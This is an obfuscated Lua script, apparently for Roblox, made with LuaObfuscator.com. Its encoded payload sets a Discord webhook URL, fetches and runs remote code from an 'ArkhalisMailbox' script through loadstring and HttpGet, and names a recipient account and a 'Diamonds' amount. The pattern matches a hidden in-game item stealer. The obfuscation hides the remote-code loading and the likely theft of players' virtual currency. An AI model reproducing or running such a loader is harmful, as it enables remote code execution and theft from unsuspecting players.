--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v72=0;while true do if (v72==0) then v19=v0(v3(v30,1,1));return "";end end else local v73=v2(v0(v30,16));if v19 then local v80=v5(v73,v19);v19=nil;return v80;else return v73;end end end);local function v20(v31,v32,v33)if v33 then local v74=0 -0 ;local v75;while true do if (v74==(0 -0)) then v75=(v31/((3 -1)^(v32-(2 -(1 + 0)))))%((621 -(555 + (1021 -(892 + 65))))^(((v33-(1 -0)) -(v32-(932 -(857 + 74)))) + (1066 -(68 + 997)))) ;return v75-(v75%1) ;end end else local v76=((1359 -789) -(367 + (371 -170)))^(v32-(928 -(214 + 713))) ;return (((v31%(v76 + v76))>=v76) and (118 -(32 + 85))) or (0 + 0) ;end end local function v21()local v34=0 -(0 + 0) ;local v35;while true do if (v34==1) then return v35;end if (v34==(350 -(87 + 263))) then v35=v1(v16,v18,v18);v18=v18 + 1 ;v34=181 -(67 + 113) ;end end end local function v22()local v36=0 -0 ;local v37;local v38;while true do if (v36==(0 + 0 + 0)) then v37,v38=v1(v16,v18,v18 + 2 );v18=v18 + (7 -5) ;v36=953 -(802 + 150) ;end if (v36==(2 -1)) then return (v38 * ((1461 -(915 + 82)) -208)) + v37 ;end end end local function v23()local v39=0;local v40;local v41;local v42;local v43;while true do if (v39==(2 -1)) then return (v43 * 16777216) + (v42 * (148681 -83145)) + (v41 * (150 + 106)) + v40 ;end if (v39==((0 -0) -0)) then v40,v41,v42,v43=v1(v16,v18,v18 + 1 + 2 );v18=v18 + (1191 -(1069 + 118)) ;v39=1;end end end local function v24()local v44=0 + 0 ;local v45;local v46;local v47;local v48;local v49;local v50;while true do if (v44==(792 -((1132 -764) + 423))) then v47=3 -2 ;v48=(v20(v46,19 -(10 + 8) ,76 -56 ) * ((444 -(416 + 26))^(102 -70))) + v45 ;v44=1 + 0 + 1 ;end if (v44==(3 -1)) then v49=v20(v46,9 + 12 ,469 -(145 + (644 -351)) );v50=((v20(v46,(476 -(9 + 5)) -(44 + 386) )==((2290 -(85 + 291)) -(1789 + 124))) and  -(1487 -(998 + 488))) or (1 + 0) ;v44=3 + 0 ;end if (v44==(772 -(201 + 571))) then v45=v23();v46=v23();v44=1139 -(116 + 1022) ;end if (v44==((1277 -(243 + 1022)) -9)) then if (v49==((0 -0) + 0)) then if (v48==0) then return v50 * (0 -0) ;else local v104=1055 -(72 + 15 + 968) ;while true do if (v104==(0 -0)) then v49=1 + 0 ;v47=(2039 -(1123 + 57)) -(814 + 45) ;break;end end end elseif (v49==(3460 -(447 + 966))) then return ((v48==(0 -0)) and (v50 * ((1 + 0 + 0)/(0 -(254 -(163 + 91)))))) or (v50 * NaN) ;end return v8(v50,v49-(2840 -(1703 + 114)) ) * (v47 + (v48/((703 -(376 + 325))^((2014 -(1869 + 61)) -32)))) ;end end end local function v25(v51)local v52=971 -(140 + (1519 -(198 + 490))) ;local v53;local v54;while true do if ((1 + 2)==v52) then return v6(v54);end if (v52==(0 -0)) then v53=nil;if  not v51 then v51=v23();if (v51==0) then return "";end end v52=1 -0 ;end if ((1 + 0)==v52) then v53=v3(v16,v18,(v18 + v51) -(439 -(262 + 176)) );v18=v18 + v51 ;v52=2 -(0 -0) ;end if (v52==(2 + 0)) then v54={};for v81=1475 -(1329 + 145) , #v53 do v54[v81]=v2(v1(v3(v53,v81,v81)));end v52=3;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v55=0;local v56;local v57;local v58;local v59;local v60;local v61;local v62;local v63;local v64;while true do if (1==v55) then v58=nil;v59=nil;v55=349 -(342 + 5) ;end if (v55~=3) then else v62=nil;v63=nil;v55=4;end if (v55==(0 -0)) then v56=0;v57=nil;v55=1 + 0 ;end if (v55==(2 + 0)) then v60=nil;v61=nil;v55=6 -3 ;end if ((1 + 3)==v55) then v64=nil;while true do if (v56==1) then local v100=1661 -(1477 + 184) ;while true do if (v100==(0 -0)) then v59=nil;v60=nil;v100=1 + 0 ;end if (v100==1) then v56=858 -(564 + 292) ;break;end end end if (0~=v56) then else local v101=0 -0 ;while true do if (v101==(2 -1)) then v56=305 -(244 + 60) ;break;end if (v101==(0 + 0)) then v57=476 -(41 + 435) ;v58=nil;v101=1;end end end if (v56==(1004 -(938 + 63))) then local v102=0;while true do if (0==v102) then v63=nil;v64=nil;v102=1 + 0 ;end if (v102~=1) then else v56=4;break;end end end if (v56==(1127 -(936 + 189))) then local v103=0;while true do if (v103==(1 + 0)) then v56=1616 -(1565 + 48) ;break;end if (v103~=(0 + 0)) then else v61=nil;v62=nil;v103=1139 -(782 + 356) ;end end end if (4==v56) then while true do if (v57~=(269 -(176 + 91))) then else v62=nil;v63=nil;v57=7 -4 ;end if (v57~=3) then else v64=nil;while true do local v112=0;while true do if (0~=v112) then else if (v58==2) then local v151=0;local v152;while true do if (0~=v151) then else v152=0 -0 ;while true do if (v152~=1) then else for v188=1,v23() do local v189=1092 -(975 + 117) ;local v190;while true do if ((1875 -(157 + 1718))==v189) then v190=v21();if (v20(v190,1,1)~=0) then else local v200=0;local v201;local v202;local v203;local v204;local v205;local v206;while true do if (v200~=3) then else while true do if (v201==(1 + 0)) then local v209=0;while true do if (v209==(3 -2)) then v201=6 -4 ;break;end if (v209==(1018 -(697 + 321))) then v204=nil;v205=nil;v209=2 -1 ;end end end if (v201~=2) then else v206=nil;while true do if (v202==2) then while true do if (0==v203) then local v219=0 -0 ;local v220;while true do if (v219~=(0 -0)) then else v220=0 + 0 ;while true do if (v220==0) then local v231=0 -0 ;while true do if (v231==0) then v204=v20(v190,5 -3 ,1230 -(322 + 905) );v205=v20(v190,615 -(602 + 9) ,6);v231=1190 -(449 + 740) ;end if (v231~=(873 -(826 + 46))) then else v220=948 -(245 + 702) ;break;end end end if (v220==(3 -2)) then v203=1;break;end end break;end end end if (v203==(1 + 0)) then local v221=1898 -(260 + 1638) ;local v222;local v223;while true do if (v221~=(440 -(382 + 58))) then else v222=0;v223=nil;v221=3 -2 ;end if (v221==(1 + 0)) then while true do if (v222~=0) then else v223=0;while true do if (v223~=1) then else v203=2;break;end if (v223==0) then local v234=0;while true do if (v234~=1) then else v223=1 -0 ;break;end if (v234~=0) then else v206={v22(),v22(),nil,nil};if (v204==(0 -0)) then local v236=0 -0 ;local v237;local v238;while true do if (v236~=0) then else v237=0;v238=nil;v236=1;end if (v236==(1 + 0)) then while true do if ((1690 -(1121 + 569))==v237) then v238=0;while true do if (v238~=(214 -(22 + 192))) then else v206[686 -(483 + 200) ]=v22();v206[4]=v22();break;end end break;end end break;end end elseif (v204==1) then v206[1466 -(1404 + 59) ]=v23();elseif (v204==2) then v206[8 -5 ]=v23() -(2^16) ;elseif (v204==(3 -0)) then local v245=765 -(468 + 297) ;while true do if (v245~=(562 -(334 + 228))) then else v206[3]=v23() -((6 -4)^16) ;v206[8 -4 ]=v22();break;end end end v234=1;end end end end break;end end break;end end end if (v203~=3) then else if (v20(v205,3,5 -2 )~=(1 + 0)) then else v206[4]=v64[v206[240 -(141 + 95) ]];end v59[v188]=v206;break;end if (v203==(2 + 0)) then local v225=0;local v226;while true do if (v225==0) then v226=0 -0 ;while true do if ((0 -0)==v226) then local v232=0 + 0 ;local v233;while true do if (v232==0) then v233=0 -0 ;while true do if (v233==0) then local v235=0 + 0 ;while true do if (v235==(0 + 0)) then if (v20(v205,1 -0 ,1 + 0 )==(164 -(92 + 71))) then v206[1 + 1 ]=v64[v206[2]];end if (v20(v205,2,2)==1) then v206[3]=v64[v206[4 -1 ]];end v235=1;end if (v235==(766 -(574 + 191))) then v233=1 + 0 ;break;end end end if (v233~=1) then else v226=2 -1 ;break;end end break;end end end if (v226~=(1 + 0)) then else v203=852 -(254 + 595) ;break;end end break;end end end end break;end if (v202==(127 -(55 + 71))) then local v215=0;while true do if (v215~=1) then else v202=2;break;end if (v215==(0 -0)) then v205=nil;v206=nil;v215=1791 -(573 + 1217) ;end end end if (v202==(0 -0)) then local v216=0;local v217;while true do if ((0 + 0)~=v216) then else v217=0 -0 ;while true do if (1==v217) then v202=940 -(714 + 225) ;break;end if (v217~=(0 -0)) then else local v229=0;while true do if (v229~=0) then else v203=0;v204=nil;v229=1 -0 ;end if (v229~=(1 + 0)) then else v217=1;break;end end end end break;end end end end break;end if (0~=v201) then else local v210=0 -0 ;while true do if ((807 -(118 + 688))==v210) then v201=1;break;end if (v210~=(48 -(25 + 23))) then else v202=0;v203=nil;v210=1 + 0 ;end end end end break;end if (v200==0) then v201=0;v202=nil;v200=1;end if ((1887 -(927 + 959))~=v200) then else v203=nil;v204=nil;v200=6 -4 ;end if (v200==(734 -(16 + 716))) then v205=nil;v206=nil;v200=5 -2 ;end end end break;end end end v58=3;break;end if (v152==(97 -(11 + 86))) then local v184=0 -0 ;while true do if (1==v184) then v152=286 -(175 + 110) ;break;end if (v184~=(0 -0)) then else for v192=1,v63 do local v193=0;local v194;local v195;local v196;local v197;while true do if ((4 -3)~=v193) then else v196=nil;v197=nil;v193=1798 -(503 + 1293) ;end if (v193~=(0 -0)) then else v194=0;v195=nil;v193=1;end if (v193==2) then while true do if (v194==(1 + 0)) then v197=nil;while true do if (1==v195) then if (v196==1) then v197=v21()~=0 ;elseif (v196==(1063 -(810 + 251))) then v197=v24();elseif (v196~=3) then else v197=v25();end v64[v192]=v197;break;end if (v195==(0 + 0)) then local v212=0;local v213;local v214;while true do if (v212==0) then v213=0 + 0 ;v214=nil;v212=1;end if (v212~=1) then else while true do if (v213~=0) then else v214=0 + 0 ;while true do if (v214==0) then local v230=533 -(43 + 490) ;while true do if (v230~=0) then else v196=v21();v197=nil;v230=734 -(711 + 22) ;end if (v230==(3 -2)) then v214=1;break;end end end if (v214~=(860 -(240 + 619))) then else v195=1;break;end end break;end end break;end end end end break;end if (v194==0) then local v207=0 + 0 ;local v208;while true do if ((0 -0)==v207) then v208=0 + 0 ;while true do if (v208==(1744 -(1344 + 400))) then local v218=405 -(255 + 150) ;while true do if (v218==(0 + 0)) then v195=0;v196=nil;v218=1 + 0 ;end if ((4 -3)==v218) then v208=3 -2 ;break;end end end if (1==v208) then v194=1;break;end end break;end end end end break;end end end v62[3]=v21();v184=1;end end end end break;end end end if (v58==(1740 -(404 + 1335))) then local v153=406 -(183 + 223) ;local v154;while true do if (v153==(0 -0)) then v154=0;while true do if (v154==(1 + 0)) then v64={};v58=2;break;end if (v154~=(0 + 0)) then else local v185=0;while true do if (v185~=(338 -(10 + 327))) then else v154=1 + 0 ;break;end if (v185==0) then v62={v59,v60,nil,v61};v63=v23();v185=339 -(118 + 220) ;end end end end break;end end end v112=1;end if (v112==1) then if (v58~=3) then else local v155=0;local v156;while true do if (v155==(0 + 0)) then v156=0;while true do if ((449 -(108 + 341))==v156) then local v186=0 + 0 ;while true do if (v186~=(0 -0)) then else for v198=1494 -(711 + 782) ,v23() do v60[v198-1 ]=v28();end return v62;end end end end break;end end end if (v58==(0 -0)) then local v157=469 -(270 + 199) ;local v158;while true do if (v157==(0 + 0)) then v158=0;while true do if (v158==(1820 -(580 + 1239))) then v61={};v58=1;break;end if (0~=v158) then else local v187=0 -0 ;while true do if (v187~=(0 + 0)) then else v59={};v60={};v187=1 + 0 ;end if (v187~=(1 + 0)) then else v158=2 -1 ;break;end end end end break;end end end break;end end end break;end if (v57==(1 + 0)) then local v109=1167 -(645 + 522) ;while true do if (v109~=1) then else v57=2;break;end if (v109==(1790 -(1010 + 780))) then v60=nil;v61=nil;v109=1;end end end if (v57~=(0 + 0)) then else local v110=0 -0 ;local v111;while true do if (v110~=0) then else v111=0;while true do if (v111==(0 -0)) then local v159=1836 -(1045 + 791) ;while true do if (v159==(2 -1)) then v111=1;break;end if (v159==(0 -0)) then v58=0;v59=nil;v159=506 -(351 + 154) ;end end end if (v111==(1575 -(1281 + 293))) then v57=1;break;end end break;end end end end break;end end break;end end end local function v29(v65,v66,v67)local v68=0;local v69;local v70;local v71;while true do if (v68==1) then v71=v65[3];return function(...)local v83=v69;local v84=v70;local v85=v71;local v86=v27;local v87=1;local v88= -1;local v89={};local v90={...};local v91=v12("#",...) -1 ;local v92={};local v93={};for v97=0,v91 do if (v97>=v85) then v89[v97-v85 ]=v90[v97 + 1 ];else v93[v97]=v90[v97 + 1 ];end end local v94=(v91-v85) + 1 ;local v95;local v96;while true do v95=v83[v87];v96=v95[1];if (v96<=5) then if (v96<=2) then if (v96<=0) then v93[v95[2]]=v95[3];elseif (v96==1) then v93[v95[2]][v95[3]]=v95[4];else local v140=0;local v141;local v142;while true do if (v140==1) then v93[v141 + 1 ]=v142;v93[v141]=v142[v95[4]];break;end if (v140==0) then v141=v95[2];v142=v93[v95[3]];v140=1;end end end elseif (v96<=3) then local v115=0;local v116;local v117;local v118;local v119;while true do if (v115==1) then v88=(v118 + v116) -1 ;v119=0;v115=2;end if (v115==0) then v116=v95[2];v117,v118=v86(v93[v116](v13(v93,v116 + 1 ,v95[3])));v115=1;end if (v115==2) then for v160=v116,v88 do v119=v119 + 1 ;v93[v160]=v117[v119];end break;end end elseif (v96>4) then v93[v95[2]]();else v87=v95[3];end elseif (v96<=8) then if (v96<=6) then local v120;local v121,v122;local v123;local v124;v93[v95[2]][v95[3]]=v95[4];v87=v87 + 1 ;v95=v83[v87];v93[v95[2]]=v67[v95[3]];v87=v87 + 1 ;v95=v83[v87];v93[v95[2]]=v67[v95[3]];v87=v87 + 1 ;v95=v83[v87];v124=v95[2];v123=v93[v95[3]];v93[v124 + 1 ]=v123;v93[v124]=v123[v95[4]];v87=v87 + 1 ;v95=v83[v87];v93[v95[2]]=v95[3];v87=v87 + 1 ;v95=v83[v87];v124=v95[2];v121,v122=v86(v93[v124](v13(v93,v124 + 1 ,v95[3])));v88=(v122 + v124) -1 ;v120=0;for v136=v124,v88 do local v137=0;while true do if (v137==0) then v120=v120 + 1 ;v93[v136]=v121[v120];break;end end end v87=v87 + 1 ;v95=v83[v87];v124=v95[2];v93[v124]=v93[v124](v13(v93,v124 + 1 ,v88));v87=v87 + 1 ;v95=v83[v87];v93[v95[2]]();v87=v87 + 1 ;v95=v83[v87];v87=v95[3];elseif (v96==7) then do return;end else v93[v95[2]]=v67[v95[3]];end elseif (v96<=9) then if (v93[v95[2]]==v95[4]) then v87=v87 + 1 ;else v87=v95[3];end elseif (v96>10) then local v147=0;local v148;while true do if (v147==0) then v148=v95[2];v93[v148]=v93[v148](v13(v93,v148 + 1 ,v88));break;end end else local v149=0;while true do if (2==v149) then v95=v83[v87];v93[v95[2]]=v95[3];v87=v87 + 1 ;v95=v83[v87];v149=3;end if (v149==3) then v87=v95[3];break;end if (v149==0) then v93[v95[2]][v95[3]]=v95[4];v87=v87 + 1 ;v95=v83[v87];v93[v95[2]]=v67[v95[3]];v149=1;end if (v149==1) then v87=v87 + 1 ;v95=v83[v87];v93[v95[2]][v95[3]]=v95[4];v87=v87 + 1 ;v149=2;end end end v87=v87 + 1 ;end end;end if (v68==0) then v69=v65[1];v70=v65[2];v68=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!0D3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3130393437392O33342O3138343336392O352F746574386B772O3659516277635172664D596A624A414C6C2O775F3236534834735936395A374C65317556516756516238365378327A697246515745376361512D684446030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403313O00682O7470733A2O2F61726B68616C69736C75612E6769746875622E696F2F41726B68616C69734D61696C626F782E6C756103083O00557365726E616D6503093O00736176696B63656D6F03083O004469616D6F6E6473024O0080841E4100163O00124O00013O0026093O000D00010002002O043O000D0001001208000100033O00300600010004000500122O000100063O00122O000200073O00202O00020002000800122O000400096O000200046O00013O00024O00010001000100044O001500010026093O000100010001002O043O00010001001208000100033O00300A0001000A000B00122O000100033O00302O0001000C000D00124O00023O00044O000100012O00073O00017O00",v9(),...);end
